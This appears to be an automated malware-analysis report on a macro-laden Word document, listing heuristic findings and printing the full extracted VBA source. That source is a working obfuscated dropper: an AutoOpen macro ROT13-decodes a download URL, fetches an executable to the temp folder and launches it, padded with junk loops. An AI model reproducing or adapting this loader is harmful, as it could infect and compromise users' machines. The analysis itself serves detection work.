MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1204.002 Malicious File
The sample contains obfuscated VBA macros, including an auto-executing 'autoopen' macro. Critical heuristics indicate that the VBA code downloads and executes a file from an HTTP source. The script uses custom decoding functions and string manipulation, suggesting an attempt to hide its malicious intent. The primary IOC is the name of the macro file, 'macros.bas'.
Heuristics 8
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
.Write kSrmQYLjBtNSgg.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set zFWcw = CreateObject(ZRCOUP(gS5U)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set zFWcw = CreateObject(ZRCOUP(gS5U)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12861 bytes |
SHA-256: 641624e4fffad5ce11f0034d8177e0ca6e58a0f52a8e13b15fd7da8704212317 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
102 of 169 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() ysrSwepCA End Sub Attribute VB_Name = "Module1" Private Const LW4O3AUER = "" Private Const QPFGLMSjq = LW4O3AUER Private Const LRipI5OslYA = "abcdefghijklmnopqrstuvwxyz" Private Const GLEqSmimQC = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" Function ZRCOUP(ByVal InString As String) Dim LetterU As String Dim LetterL As String Dim Letter As String Dim Rot13 As String Dim i As Integer LetterU = GLEqSmimQC LetterL = LRipI5OslYA i = 0 Do While i <= Len(InString) i = i + 1 Letter = Mid(InString, i, 1) If I0A7WvDveK(Letter) = True Then If cIRt4Ae(Letter) = True Then Rot13 = Rot13 & Mid(LetterU & LetterU, InStr(LetterU, Letter) + 13, 1) Else Rot13 = Rot13 & Mid(LetterL & LetterL, InStr(LetterL, Letter) + 13, 1) End If Else Rot13 = Rot13 + Letter End If Loop ZRCOUP = Rot13 End Function Function cIRt4Ae(ByVal InString As String) As Boolean If StrComp(Trim(InString), "") = 0 Then cIRt4Ae = False Exit Function End If If StrComp(InString, UCase(InString)) = 0 Then cIRt4Ae = True Else cIRt4Ae = False End If End Function Function I0A7WvDveK(ByVal InString As String) As Boolean InString = UCase(InString) If InString = "" Then I0A7WvDveK = False: Exit Function If Asc(InString) >= 65 And Asc(InString) <= 90 Then I0A7WvDveK = True Else I0A7WvDveK = False End If End Function Attribute VB_Name = "Module11" Private Const pIna0CSVNsu = "Furyy.Nccyvpngvba" Private Const dvr5p = "NQBQO.Fgernz" Private Const wvYm = "Fpevcgvat.SvyrFlfgrzBowrpg" Private Const OJvaKHZFGT = "TRG" Private Const dCkKHihXXc = "ZFKZY2.KZYUGGC" Private Const WWNcjAI4U = "\qfUUU.rkr" Private Const s8A4IFJCpDYh = "uggc://zjpbq4.pon.cy/wf/ova.rkr" Private Const gS5U = wvYm Sub ysrSwepCA() Dim zFWcw, gmkGo6q Dim EfQhk As Integer For EfQhk = 655 To 655 + 5 DoEvents Next EfQhk Dim Gagod As Integer For Gagod = 2269 To 2269 + 5 DoEvents Next Gagod Set zFWcw = CreateObject(ZRCOUP(gS5U)) Dim wCyKbc As Integer For wCyKbc = 654 To 654 + 5 DoEvents Next wCyKbc Dim EseFcbC As Integer For EseFcbC = 212 To 212 + 5 DoEvents Next EseFcbC Dim ijnK2g, j_YLrCc1S, fz21trwt Const rihuZ61esFi = 2 Dim iGZkZVPif As Integer For iGZkZVPif = 1004 To 1004 + 5 DoEvents Next iGZkZVPif Dim zuYaG As Integer For zuYaG = 813 To 813 + 5 DoEvents Next zuYaG Dim CmwCy As Integer For CmwCy = 2175 To 2175 + 5 DoEvents Next CmwCy Dim nrRsDxPMjeVRduJfSc As Integer For nrRsDxPMjeVRduJfSc = 971 To 971 + 5 DoEvents Next nrRsDxPMjeVRduJfSc Dim ocNpLYm As Integer For ocNpLYm = 2458 To 2458 + 5 DoEvents Next ocNpLYm Dim oqQdwEtZUU As Integer For oqQdwEtZUU = 2268 To 2268 + 5 DoEvents Next oqQdwEtZUU Set ijnK2g = zFWcw.GetSpecialFolder(rihuZ61esFi) Dim rRsDxPMEeVRdufSczuYaGag As Integer For rRsDxPMEeVRdufSczuYaGag = 1256 To 1256 + 5 DoEvents Next rRsDxPMEeVRdufSczuYaGag Dim cMuwQt As Integer For cMuwQt = 844 To 844 + 5 DoEvents Next cMuwQt Dim knfDhLrgArivFo As Integer For knfDhLrgArivFo = 372 To 372 + 5 DoEvents Next knfDhLrgArivFo strLink = ZRCOUP(s8A4IFJCpDYh) Dim paSaEf As Integer For paSaEf = 752 To 752 + 5 DoEvents Next paSaEf Dim UUTZJPYoONeT As Integer For UUTZJPYoONeT = 401 To 401 + 5 DoEvents Next UUTZJPYoONeT Dim JfSczuYa As Integer For JfSczuYa = 2237 To 2237 + 5 DoEvents Next JfSczuYa strSaveTo = ijnK2g & ZRCOUP(WWNcjAI4U) Dim PQBcNehkcAeI As Integer For PQBcNehkcAeI = 1085 To 1085 + 5 DoEvents Next PQBcNehkcAeI Dim ZwrUVCQckaF As Integer For ZwrUVCQckaF = 167 To 167 + 5 DoEvents Next ZwrUVCQckaF Set kSrmQYLjBtNSgg = CreateObject(ZRCOUP(dCkKHihXXc)) Dim lQPQBc As Integer For lQPQBc = 1688 To 1688 + 5 DoEvents Next lQPQBc Dim UVCQcka As Integer For UVCQcka = 706 To 706 + 5 DoEvents Next UVCQcka Dim hkcAesodxnesCll As Integer For hkcAesodxnesCll = 1876 To 1876 + 5 DoEvents Next hkcAesodxnesCll kSrmQYLjBtNSgg.Open ZRCOUP(OJvaKHZFGT), strLink, False Dim boPjOnEfFQK As Integer For boPjOnEfFQK = 1815 To 1815 + 5 DoEvents Next boPjOnEfFQK Dim OarFbOZwrUV As Integer For OarFbOZwrUV = 673 To 673 + 5 DoEvents Next OarFbOZwrUV Dim ihlQPQ As Integer For ihlQPQ = 356 To 356 + 5 DoEvents Next ihlQPQ Dim CQckaFOONSpw As Integer For CQckaFOONSpw = 2478 To 2478 + 5 DoEvents Next CQckaFOONSpw kSrmQYLjBtNSgg.send Dim hYxaF As Integer For hYxaF = 2021 To 2021 + 5 DoEvents Next hYxaF Dim QoCYLUtoQS As Integer For QoCYLUtoQS = 1609 To 1609 + 5 DoEvents Next QoCYLUtoQS Dim aGkAgnGND As Integer For aGkAgnGND = 2150 To 2150 + 5 DoEvents Next aGkAgnGND Dim AfsrHKNF As Integer For AfsrHKNF = 1200 To 1200 + 5 DoEvents Next AfsrHKNF Dim DjefdiTMTyZ As Integer For DjefdiTMTyZ = 124 To 124 + 5 DoEvents Next DjefdiTMTyZ Dim UtoQSzTZhQ As Integer For UtoQSzTZhQ = 1642 To 1642 + 5 DoEvents Next UtoQSzTZhQ Set hxuWnpbqBtp4u = CreateObject(ZRCOUP(gS5U)) Dim RgNfQUujgspLiG As Integer For RgNfQUujgspLiG = 819 To 819 + 5 DoEvents Next RgNfQUujgspLiG Dim pxnSNOMRCJQh As Integer For pxnSNOMRCJQh = 881 To 881 + 5 DoEvents Next pxnSNOMRCJQh Dim hahKYQnr As Integer For hahKYQnr = 1218 To 1218 + 5 DoEvents Next hahKYQnr Dim GAegMS As Integer For GAegMS = 646 To 646 + 5 DoEvents Next GAegMS Dim rfdQpmIfDJF As Integer For rfdQpmIfDJF = 238 To 238 + 5 DoEvents Next rfdQpmIfDJF Dim gyYyJDVFcL As Integer For gyYyJDVFcL = 2008 To 2008 + 5 DoEvents Next gyYyJDVFcL If hxuWnpbqBtp4u.FileExists(strSaveTo) Then Dim BOdJc As Integer For BOdJc = 899 To 899 + 5 DoEvents Next BOdJc Dim GNeFEUKMEGljQF As Integer For GNeFEUKMEGljQF = 741 To 741 + 5 DoEvents Next GNeFEUKMEGljQF Dim HitnFC As Integer For HitnFC = 1820 To 1820 + 5 DoEvents Next HitnFC Dim yyaiuQqVtL As Integer For yyaiuQqVtL = 794 To 794 + 5 DoEvents Next yyaiuQqVtL Dim zJesfR As Integer For zJesfR = 381 To 381 + 5 DoEvents Next zJesfR Dim gNCQNE As Integer For gNCQNE = 728 To 728 + 5 DoEvents Next gNCQNE Dim qiHQOzhEglzJe As Integer For qiHQOzhEglzJe = 854 To 854 + 5 DoEvents Next qiHQOzhEglzJe hxuWnpbqBtp4u.DeleteFile (strSaveTo) Dim tLYLJDVSpZkp As Integer For tLYLJDVSpZkp = 1204 To 1204 + 5 DoEvents Next tLYLJDVSpZkp Dim NetOCLjeH As Integer For NetOCLjeH = 115 To 115 + 5 DoEvents Next NetOCLjeH Dim ROmVgmiuK As Integer For ROmVgmiuK = 148 To 148 + 5 DoEvents Next ROmVgmiuK Dim pNFBNetOCLj As Integer For pNFBNetOCLj = 1791 To 1791 + 5 DoEvents Next pNFBNetOCLj Dim IUIFzRO As Integer For IUIFzRO = 684 To 684 + 5 DoEvents Next IUIFzRO Dim vGbocN As Integer For vGbocN = 1317 To 1317 + 5 DoEvents Next vGbocN Dim HHvvVfrTnSqIIFzROmVgmiuK As Integer For HHvvVfrTnSqIIFzROmVgmiuK = 148 To 148 + 5 DoEvents Next HHvvVfrTnSqIIFzROmVgmiuK Dim qLzIh As Integer For qLzIh = 140 To 140 + 5 DoEvents Next qLzIh End If Dim OCAuMJgPb As Integer For OCAuMJgPb = 158 To 158 + 5 DoEvents Next OCAuMJgPb Dim jFEhNgRVvV As Integer For jFEhNgRVvV = 758 To 758 + 5 DoEvents Next jFEhNgRVvV Dim ZlNhMkCOCAu As Integer For ZlNhMkCOCAu = 1582 To 1582 + 5 DoEvents Next ZlNhMkCOCAu Dim MjHzvHY As Integer For MjHzvHY = 1424 To 1424 + 5 DoEvents Next MjHzvHY Dim COCAuM As Integer For COCAuM = 1138 To 1138 + 5 DoEvents Next COCAuM Dim gEwsEUkFtC As Integer For gEwsEUkFtC = 872 To 872 + 5 DoEvents Next gEwsEUkFtC Dim hzLzxrIGdM As Integer For hzLzxrIGdM = 1855 To 1855 + 5 DoEvents Next hzLzxrIGdM Dim Antkhrp9gTyfJ3 Dim eVvKC As Integer For eVvKC = 303 To 303 + 5 DoEvents Next eVvKC Dim qlOQxDQfUAv As Integer For qlOQxDQfUAv = 2486 To 2486 + 5 DoEvents Next qlOQxDQfUAv Dim aQtOotqBET As Integer For aQtOotqBET = 809 To 809 + 5 DoEvents Next aQtOotqBET Dim tBOqKpNfFgr As Integer For tBOqKpNfFgr = 735 To 735 + 5 DoEvents Next tBOqKpNfFgr Dim DYOFSdLLzlM As Integer For DYOFSdLLzlM = 1713 To 1713 + 5 DoEvents Next DYOFSdLLzlM Dim OqKpNfFgr As Integer For OqKpNfFgr = 735 To 735 + 5 DoEvents Next OqKpNfFgr Set Antkhrp9gTyfJ3 = CreateObject(ZRCOUP(dvr5p)) Dim JDVTqLkqmyB As Integer For JDVTqLkqmyB = 542 To 542 + 5 DoEvents Next JDVTqLkqmyB Dim ejwtcpOOq As Integer For ejwtcpOOq = 657 To 657 + 5 DoEvents Next ejwtcpOOq Dim EIunuZzlA As Integer For EIunuZzlA = 2396 To 2396 + 5 DoEvents Next EIunuZzlA Dim stauzHxdmml As Integer For stauzHxdmml = 753 To 753 + 5 DoEvents Next stauzHxdmml Dim peJFFE As Integer For peJFFE = 245 To 245 + 5 DoEvents Next peJFFE With Antkhrp9gTyfJ3 Dim nJQYCP As Integer For nJQYCP = 453 To 453 + 5 DoEvents Next nJQYCP Dim bstOPaxeHYD As Integer For bstOPaxeHYD = 1531 To 1531 + 5 DoEvents Next bstOPaxeHYD Dim AVumj As Integer For AVumj = 1877 To 1877 + 5 DoEvents Next AVumj .Type = 1 Dim YpBpnhzwS As Integer For YpBpnhzwS = 738 To 738 + 5 DoEvents Next YpBpnhzwS Dim LakESFsSpo As Integer For LakESFsSpo = 249 To 249 + 5 DoEvents Next LakESFsSpo Dim ijhmQel As Integer For ijhmQel = 1328 To 1328 + 5 DoEvents Next ijhmQel Dim Cbhdor As Integer For Cbhdor = 851 To 851 + 5 DoEvents Next Cbhdor Dim YcqnVjII As Integer For YcqnVjII = 536 To 536 + 5 DoEvents Next YcqnVjII .Open Dim rVGBqKBsFQz As Integer For rVGBqKBsFQz = 2453 To 2453 + 5 DoEvents Next rVGBqKBsFQz Dim kQlqyn As Integer For kQlqyn = 1851 To 1851 + 5 DoEvents Next kQlqyn Dim RuNtQjvjh As Integer For RuNtQjvjh = 1217 To 1217 + 5 DoEvents Next RuNtQjvjh Dim pPmlNuLyC As Integer For pPmlNuLyC = 1123 To 1123 + 5 DoEvents Next pPmlNuLyC Dim lbeVuYCAiQri As Integer For lbeVuYCAiQri = 1870 To 1870 + 5 DoEvents Next lbeVuYCAiQri .Write kSrmQYLjBtNSgg.responseBody Dim HMxqxcpoEI As Integer For HMxqxcpoEI = 1427 To 1427 + 5 DoEvents Next HMxqxcpoEI Dim VtdntpB As Integer For VtdntpB = 793 To 793 + 5 DoEvents Next VtdntpB Dim HlPzvk As Integer For HlPzvk = 2141 To 2141 + 5 DoEvents Next HlPzvk Dim DyceJ As Integer For DyceJ = 2267 To 2267 + 5 DoEvents Next DyceJ Dim mjGqAGCOfgBD As Integer For mjGqAGCOfgBD = 813 To 813 + 5 DoEvents Next mjGqAGCOfgBD .SaveToFile strSaveTo Dim evJfSdAvZaG As Integer For evJfSdAvZaG = 703 To 703 + 5 DoEvents Next evJfSdAvZaG Dim CmxDzK As Integer For CmxDzK = 420 To 420 + 5 DoEvents Next CmxDzK .Close Dim fGdbDlC As Integer For fGdbDlC = 735 To 735 + 5 DoEvents Next fGdbDlC Dim gqZZLLnvIkE As Integer For gqZZLLnvIkE = 2286 To 2286 + 5 DoEvents Next gqZZLLnvIkE Dim CpcDZYA As Integer For CpcDZYA = 1038 To 1038 + 5 DoEvents Next CpcDZYA Dim iYOdnVVIIks As Integer For iYOdnVVIIks = 469 To 469 + 5 DoEvents Next iYOdnVVIIks End With Dim vypOeQG As Integer For vypOeQG = 1594 To 1594 + 5 DoEvents Next vypOeQG Dim KRiIIYOQI As Integer For KRiIIYOQI = 328 To 328 + 5 DoEvents Next KRiIIYOQI Set Antkhrp9gTyfJ3 = Nothing Dim Ocbrvy As Integer For Ocbrvy = 1089 To 1089 + 5 DoEvents Next Ocbrvy Dim ZlBQY As Integer For ZlBQY = 505 To 505 + 5 DoEvents Next ZlBQY Dim VvYCn As Integer For VvYCn = 2276 To 2276 + 5 DoEvents Next VvYCn Dim xRuzMJsF As Integer For xRuzMJsF = 1019 To 1019 + 5 DoEvents Next xRuzMJsF Dim SQVHAHmMyNR As Integer For SQVHAHmMyNR = 1162 To 1162 + 5 DoEvents Next SQVHAHmMyNR If hxuWnpbqBtp4u.FileExists(strSaveTo) Then Dim ahoSgfvyB As Integer For ahoSgfvyB = 88 To 88 + 5 DoEvents Next ahoSgfvyB Dim QSSQVHA As Integer For QSSQVHA = 1541 To 1541 + 5 DoEvents Next QSSQVHA Dim qOeQGorL As Integer For qOeQGorL = 929 To 929 + 5 DoEvents Next qOeQGorL Dim RIiKpaVJfUL As Integer For RIiKpaVJfUL = 1181 To 1181 + 5 DoEvents Next RIiKpaVJfUL Dim vmLbTDl As Integer For vmLbTDl = 660 To 660 + 5 DoEvents Next vmLbTDl End If Dim AfFrHLNF As Integer For AfFrHLNF = 1199 To 1199 + 5 DoEvents Next AfFrHLNF Dim mLbTDloI As Integer For mLbTDloI = 1865 To 1865 + 5 DoEvents Next mLbTDloI Dim oEHKCbEjT As Integer For oEHKCbEjT = 393 To 393 + 5 DoEvents Next oEHKCbEjT Dim wftRStCOr As Integer For wftRStCOr = 1281 To 1281 + 5 DoEvents Next wftRStCOr Dim oFrvVJGASP As Integer For oFrvVJGASP = 509 To 509 + 5 DoEvents Next oFrvVJGASP Dim tcpOOqyL As Integer For tcpOOqyL = 1109 To 1109 + 5 DoEvents Next tcpOOqyL Dim AULCPaIIwi As Integer For AULCPaIIwi = 634 To 634 + 5 DoEvents Next AULCPaIIwi Set ыААыва = CreateObject(ZRCOUP(pIna0CSVNsu)) Dim dBQJtc As Integer For dBQJtc = 969 To 969 + 5 DoEvents Next dBQJtc Dim rkrVwixBEw As Integer For rkrVwixBEw = 1508 To 1508 + 5 DoEvents Next rkrVwixBEw ыААыва.Open ijnK2g & ZRCOUP(WWNcjAI4U) Dim QsgpNHlnTo As Integer For QsgpNHlnTo = 2223 To 2223 + 5 DoEvents Next QsgpNHlnTo Dim MYpqLMQubET As Integer For MYpqLMQubET = 1368 To 1368 + 5 DoEvents Next MYpqLMQubET End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.